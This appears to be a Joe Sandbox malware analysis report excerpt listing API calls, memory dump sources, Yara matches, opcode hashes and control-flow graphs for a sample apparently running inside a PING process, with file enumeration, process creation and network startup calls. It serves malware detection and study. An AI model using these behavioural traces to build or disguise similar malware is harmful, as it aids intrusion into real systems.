                                          • API String ID: 0-676540984
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: &$@JGR$@JGR$A\OV
                                          • API String ID: 0-1876648471

                                          Execution Graph

                                          Execution Coverage:2.3%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:1.7%
                                          Total number of Nodes:406
                                          Total number of Limit Nodes:62
                                          APIs
                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 0048C0EF
                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 0048C12E
                                          • FindClose.KERNELBASE(?), ref: 0048C139
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNext
                                          • String ID:
                                          • API String ID: 3541575487-0
                                          APIs
                                          • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00498C0E
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          APIs
                                          • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00498D66
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          APIs
                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00498E44
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5709f89bfb2c826ea6327f9a95bfc51ce7a38b3a162da27ea5cdfbb0bf68b99d
                                          • Instruction ID: 7fbbe0933724d5e48f3bf8e55e1da17eec709ca5375a373f39fef32cf675cf44
                                          • Opcode Fuzzy Hash: 5709f89bfb2c826ea6327f9a95bfc51ce7a38b3a162da27ea5cdfbb0bf68b99d
                                          • Instruction Fuzzy Hash: 4690027124151453D11171584505707000987D0641F95C512A0424558D9E568A56A131
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 0a77b3839f1f725731a7b160780c9b39ff8928dd997c1521e3aa181c1459982f
                                          • Instruction ID: c1dd1b3c440d80509e2515153da2b7ac23256d5756f1b17a14f0826d8231f4ca
                                          • Opcode Fuzzy Hash: 0a77b3839f1f725731a7b160780c9b39ff8928dd997c1521e3aa181c1459982f
                                          • Instruction Fuzzy Hash: A790026925351042D1807158540960B000587D1602F95D515A0015558CCD15896D5331
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2e34537f07a7c126d8fab71e6544ec48135f3840d0c93ed4f9ff6524c646a5da
                                          • Instruction ID: abbaef16ffe0ec4a5079ab465ef0207755943ee5ecd227501043c561cdbd76d5
                                          • Opcode Fuzzy Hash: 2e34537f07a7c126d8fab71e6544ec48135f3840d0c93ed4f9ff6524c646a5da
                                          • Instruction Fuzzy Hash: 3990047134151043D140715C541D7074005D7F1701F55D111F0414554CDD15CD5F5333
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 614dbbdb429b5c571f6c78453e39c64f559add37833ddb386a9a1ff198cc86a4
                                          • Instruction ID: 4437a8f1b8f08221ee19d53af3932870214d14571e9e91fb2070233538003bb3
                                          • Opcode Fuzzy Hash: 614dbbdb429b5c571f6c78453e39c64f559add37833ddb386a9a1ff198cc86a4
                                          • Instruction Fuzzy Hash: 0890027164561442D10071584515707100587D0601F65C511A0424568D8F958A5565B2
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 28536fa457f180f2561d40ddf41bd1b62528c54c53474e9039c31222b808b63b
                                          • Instruction ID: 483799a4c09e07b997c33193e050e40d125241d432d9af7a42474b734f9ec247
                                          • Opcode Fuzzy Hash: 28536fa457f180f2561d40ddf41bd1b62528c54c53474e9039c31222b808b63b
                                          • Instruction Fuzzy Hash: F290026128556142D150715C44056174005A7E0601F55C121A0814594D8D5589596231

                                          Control-flow Graph

                                          control_flow_graph 433 493500-493548 call 49ae50 436 49354e-4935c5 call 49af30 call 483f50 call 471410 call 491660 433->436 437 493654-49365a 433->437 446 4935d0-4935e4 Sleep 436->446 447 493645-49364c 446->447 448 4935e6-4935f8 446->448 447->446 449 49364e 447->449 450 49361a-493633 call 495a60 448->450 451 4935fa-493618 call 4959c0 448->451 449->437 454 493638-49363b 450->454 451->454 454->447
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 004935DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: &}}~$net.dll$wininet.dll
                                          • API String ID: 3472027048-1471689447
                                          • Opcode ID: 733b980ceacce79c792ac3ab9880a04dac2209a9f4b6b923c0c3c06aa0fabb3a
                                          • Instruction ID: a686c764261946dda0340cc0ef4306555ed648645afbec16532197004af2ad65
                                          • Opcode Fuzzy Hash: 733b980ceacce79c792ac3ab9880a04dac2209a9f4b6b923c0c3c06aa0fabb3a
                                          • Instruction Fuzzy Hash: 23318DB1600305BBDB14DFA5CC80FEBBBB8BB85714F14812DB6196B241D7746A41CBA9

                                          Control-flow Graph

                                          control_flow_graph 456 480782-4807fa call 49af80 call 49b990 call 483f50 call 471410 call 491660 467 48081a-480820 456->467 468 4807fc-48080b PostThreadMessageW 456->468 468->467 469 48080d-480817 468->469 469->467
                                          APIs
                                          • PostThreadMessageW.USER32(Z426iIL7,00000111,00000000,00000000), ref: 00480807
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: Z426iIL7$Z426iIL7
                                          • API String ID: 1836367815-738817621
                                          • Opcode ID: f202fae4bc7f6fcc54dd93d1e1b509dfb7c8cb090e00964b93935d68a7cc6b8c
                                          • Instruction ID: 986936543d2ca3a1ce76328dcde6a9b5890985a12017754fca3cedee07a1e65a
                                          • Opcode Fuzzy Hash: f202fae4bc7f6fcc54dd93d1e1b509dfb7c8cb090e00964b93935d68a7cc6b8c
                                          • Instruction Fuzzy Hash: DD1186B2D0021DBAEB01AAD58C81DEF7B7CEF41794F04856AF618A7101D6295E0687E5

                                          Control-flow Graph

                                          control_flow_graph 470 480790-4807a2 471 4807aa-4807fa call 49b990 call 483f50 call 471410 call 491660 470->471 472 4807a5 call 49af80 470->472 481 48081a-480820 471->481 482 4807fc-48080b PostThreadMessageW 471->482 472->471 482->481 483 48080d-480817 482->483 483->481
                                          APIs
                                          • PostThreadMessageW.USER32(Z426iIL7,00000111,00000000,00000000), ref: 00480807
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: Z426iIL7$Z426iIL7
                                          • API String ID: 1836367815-738817621
                                          • Opcode ID: 493ddfe56fbc02f417c547f00954e90e157f335a28a000d9db335e44f9e6d4b5
                                          • Instruction ID: a8eaed33805419ec2938df202f03182963ff824748063a29212a475e7afc3ad6
                                          • Opcode Fuzzy Hash: 493ddfe56fbc02f417c547f00954e90e157f335a28a000d9db335e44f9e6d4b5
                                          • Instruction Fuzzy Hash: B00184B2D0021D7AEB11AAE58C81DEFBB7CEF41794F04846AFA14A7241D6285E0687E5
                                          APIs
                                          • WSAStartup.WS2_32(00000202,?), ref: 004816DA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Startup
                                          • String ID: ZPK
                                          • API String ID: 724789610-297889628
                                          • Opcode ID: 88b6ebde5fdda95ea1d8457e27f337ecc79eabf421ececc7035c6bfec81aae24
                                          • Instruction ID: 77490d9577a4dd0eaace97c37e6709ef43db378f67f9533d463baca069033e28
                                          • Opcode Fuzzy Hash: 88b6ebde5fdda95ea1d8457e27f337ecc79eabf421ececc7035c6bfec81aae24
                                          • Instruction Fuzzy Hash: F491B3B1D00205ABDB10EFA5CC45BEEBBF8BF44704F04452FE508A7251EB785656CBA9
                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,^}H,00000010,?,?,?,00000044,?,00000010,00487D5E,?,?,?), ref: 00499273
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID: ^}H
                                          • API String ID: 2186235152-2079659185
                                          • Opcode ID: e44c0d24ac9a83e4dbc0106651f8f6e45fdf516143e9af47306da256b49cd6e5
                                          • Instruction ID: c61fda9aa7c3e404359268dc0c2d1b8f03b69c03c510036d4d0bb9301287c3fc
                                          • Opcode Fuzzy Hash: e44c0d24ac9a83e4dbc0106651f8f6e45fdf516143e9af47306da256b49cd6e5
                                          • Instruction Fuzzy Hash: 9701C4B2200108BFCB54DF99DC81EDB77ADAF8C754F008109BA09E3240D670F851CBA4
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0048EF47
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Initialize
                                          • String ID: @J7<
                                          • API String ID: 2538663250-2016760708
                                          • Opcode ID: dd0144e5529cee17762b5b65aafb3f30690918e395ae57dc747e0fe3eb918eb4
                                          • Instruction ID: 216ce951510255de4e12dffec4ef73d067a11b2e9a662ecb8f2e20b36296d71e
                                          • Opcode Fuzzy Hash: dd0144e5529cee17762b5b65aafb3f30690918e395ae57dc747e0fe3eb918eb4
                                          • Instruction Fuzzy Hash: CC4142B6A00209AFDB10DFD9D8809EFB7B9FF88304B10455AE905EB315D775EE458BA0
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0048EF47
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Initialize
                                          • String ID: @J7<
                                          • API String ID: 2538663250-2016760708
                                          • Opcode ID: ec6766677c07e489ca9da14c3b414f78c5e867f71e76f26d24433c20151fe122
                                          • Instruction ID: 8947d24a27eaf4d100390cbddf58e48e831136b347b03f3e72f060a000d16adb
                                          • Opcode Fuzzy Hash: ec6766677c07e489ca9da14c3b414f78c5e867f71e76f26d24433c20151fe122
                                          • Instruction Fuzzy Hash: AD3150B5A0020AAFDB00DFD9D8809EFB7B9FF88304B108559E505EB314D775EE058BA0
                                          APIs
                                          • WSAStartup.WS2_32(00000202,?), ref: 004816DA
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Startup
                                          • String ID:
                                          • API String ID: 724789610-0
                                          • Opcode ID: d5a77c2508db5565939c9f28682d20aeb535eb40bd0bdd7323ae3ccf6847c5dc
                                          • Instruction ID: 30cc69d1950d35b4396c8e534641039bc34495cc164495dad61e21a79c82c304
                                          • Opcode Fuzzy Hash: d5a77c2508db5565939c9f28682d20aeb535eb40bd0bdd7323ae3ccf6847c5dc
                                          • Instruction Fuzzy Hash: EA11E771D01209EFCB01EBE58C42BDEB7B8AF49700F14415BE608B7242E7746E1587EA
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00483FC2
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 0d697ff97b7bf7ef080c10395bac8f7f97858c555f2fc09287bfaac7e5fb147e
                                          • Instruction ID: c3125f03a815884ddf1b77c35734aa294474b54de7911c6e080540b29966dbe5
                                          • Opcode Fuzzy Hash: 0d697ff97b7bf7ef080c10395bac8f7f97858c555f2fc09287bfaac7e5fb147e
                                          • Instruction Fuzzy Hash: 210152B5E0020DABDF10EBA1DC42F9EB7789B14708F0045A5FA0897241F634EB148B95
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00479C52
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 37362aaafeed4a5e23fb9a2d9634cbe18d972f57c5eb88243c94a6eb64895a28
                                          • Instruction ID: a137946f2cef61b9fe17e4b9ba82b8928c29476d3b3c40bd926e7a9648cc01a0
                                          • Opcode Fuzzy Hash: 37362aaafeed4a5e23fb9a2d9634cbe18d972f57c5eb88243c94a6eb64895a28
                                          • Instruction Fuzzy Hash: A4F0653338031436E620659A9C02FDB778CCB81BA5F15402AF70CEB1C0D895B80142E8
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00479C52
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 535810a2220f2b74d42c3d5331bb41657a11b694ae2c637da9ad4097db73b4a7
                                          • Instruction ID: ee8f4205b153dfb9b2c3458898bc31a3ef831d4756c2cf4622f4b1f4c519b071
                                          • Opcode Fuzzy Hash: 535810a2220f2b74d42c3d5331bb41657a11b694ae2c637da9ad4097db73b4a7
                                          • Instruction Fuzzy Hash: A3F06D7368031436E631659ACC02FDB768CCB81BA1F25402AF70CEB6C0E999B80042E8
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00481429,?,004956C7,00481429,004950FF,004956C7,?,00481429,004950FF,00001000,?,?,00000000), ref: 0049916C
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
